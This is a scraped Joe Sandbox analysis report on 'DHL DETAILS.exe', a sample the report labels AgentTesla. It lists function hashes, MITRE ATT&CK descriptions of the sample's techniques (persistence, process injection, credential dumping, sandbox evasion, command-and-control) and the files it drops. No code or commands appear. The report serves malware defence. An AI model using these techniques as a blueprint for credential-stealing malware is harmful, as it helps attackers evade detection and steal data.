Instruction Fuzzy Hash: B801A2327111209FC7299B3DE80492A77EAEF8971531541B9EC05DB374CA39EC028B90

Uniqueness

Uniqueness Score: -1.00%

Function 015E5228 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aee3b72232203d92ca41d64ceeab0c4232d1ae346100c98e9612b1bb4ab0396
Instruction ID: f0a898c43cd9db1bae70cb69a260cbce05b03261d254b18df39702f1ac3aa55d
Opcode Fuzzy Hash: 9aee3b72232203d92ca41d64ceeab0c4232d1ae346100c98e9612b1bb4ab0396
Instruction Fuzzy Hash: 36F044767111208FC7299B3DE84481A77EAEF8976531541B9EC05DB375CA39EC018F90

Uniqueness

Uniqueness Score: -1.00%

Function 015E0A98 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69254c7f11a9a73161a7c00d20087e36bf29521976961790123b4b4a8140001f
Instruction ID: 3b3798c32b65ed9e40dd1658768f2dc1cd88763297dc7b3601081885356eb3fc
Opcode Fuzzy Hash: 69254c7f11a9a73161a7c00d20087e36bf29521976961790123b4b4a8140001f
Instruction Fuzzy Hash: D801A230B053458BDB196F74E46D36D3BA5BB41718F0404BDEA06C72D5DAAD8C86C741

Uniqueness

Uniqueness Score: -1.00%

Function 015E0AA8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46fcbfad154e7aa2958f2abdf431a158697e1120d7182199ae107ffe39cfa680
Instruction ID: 9f2e33cf1c9abe69aafdf34117547df6d85ab057b08acf8bdada2e49264adbcf
Opcode Fuzzy Hash: 46fcbfad154e7aa2958f2abdf431a158697e1120d7182199ae107ffe39cfa680
Instruction Fuzzy Hash: 51F06231B0121547DB186B78E45D32E3B99B740745F040179AA06C72C4DEEACC86C781

Uniqueness

Uniqueness Score: -1.00%

Function 015E4B34 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e30e9590d30e3293045f7edc57987dcc966ed4c03e187d4df4e4391551d888
Instruction ID: 660415b5a1390d77e0cbbebf18fa5a6626e9ed66244f27807899b5fc0f716e4c
Opcode Fuzzy Hash: c2e30e9590d30e3293045f7edc57987dcc966ed4c03e187d4df4e4391551d888
Instruction Fuzzy Hash: 92F0F075D09244EECB05DBF5A85949CBFB5EF81304F0480DAD05697129E6784A09CB51

Uniqueness

Uniqueness Score: -1.00%

Function 015E5148 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d767f2f3d19ed7ab09d3bf5eeb96fe4f81201563d13e3ead947a7b0a4f850d6
Instruction ID: 16980889991decb4555e6bc6f58c8d778ac3efa275a8786f38e7309693e16cb1
Opcode Fuzzy Hash: 2d767f2f3d19ed7ab09d3bf5eeb96fe4f81201563d13e3ead947a7b0a4f850d6
Instruction Fuzzy Hash: D3E09B353011049BC314DE69E85485EBBFEFBC8351B504539E90EC3319DE365C058B60

Uniqueness

Uniqueness Score: -1.00%

Function 015E13B0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d725078bea3b246e09539920fbeb834361af5b88a28963a697065d8dc8c34b32
Instruction ID: bbdf7b0723861f3c119ddae429bf124f816ade04837737d35e815151c911c5da
Opcode Fuzzy Hash: d725078bea3b246e09539920fbeb834361af5b88a28963a697065d8dc8c34b32
Instruction Fuzzy Hash: 4EF0A4B4A41205CFDB18EF64D1A8A68B7F1FF89704F1044A9E8069F3A5CB799C05CF01

Uniqueness

Uniqueness Score: -1.00%

Function 015E0F28 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec3dfa8b32c28c6031546bc8e4f86d38ec23929cd947a14a117db281310144ee
Instruction ID: c776bef5a2998c656e1f644e6aa57c02d7f808827adfd2fa51146b2f5609142e
Opcode Fuzzy Hash: ec3dfa8b32c28c6031546bc8e4f86d38ec23929cd947a14a117db281310144ee
Instruction Fuzzy Hash: D8E04F31A01109ABCB00DFA8ED11BDDB7BDFB85608F1041AD9808D3211E6359E049791

Uniqueness

Uniqueness Score: -1.00%

Function 015E0F38 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5707ec649875552988dd8df53002ae29277ebe9bc8d3db40e33861bdd3b4ebfc
Instruction ID: 0e000f6b20e1368c62def9faf7809919e71abfc583d351aabb641dc7fcfffccb
Opcode Fuzzy Hash: 5707ec649875552988dd8df53002ae29277ebe9bc8d3db40e33861bdd3b4ebfc
Instruction Fuzzy Hash: 1CD01270E01109EFCB00DFA8E90155D77F9EB48208B1041A99809D3204EA355E049B81

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL DETAILS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_d2e81bc18818764af46188ab18e286c7b5d_a076064d_0f97c80e-3a0b-4df9-b014-53ec64cb05d6\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1829.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC1B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC99.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBCB6.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD92.tmp.txt

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL DETAILS.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VHFSQv.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
DHL DETAILS.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre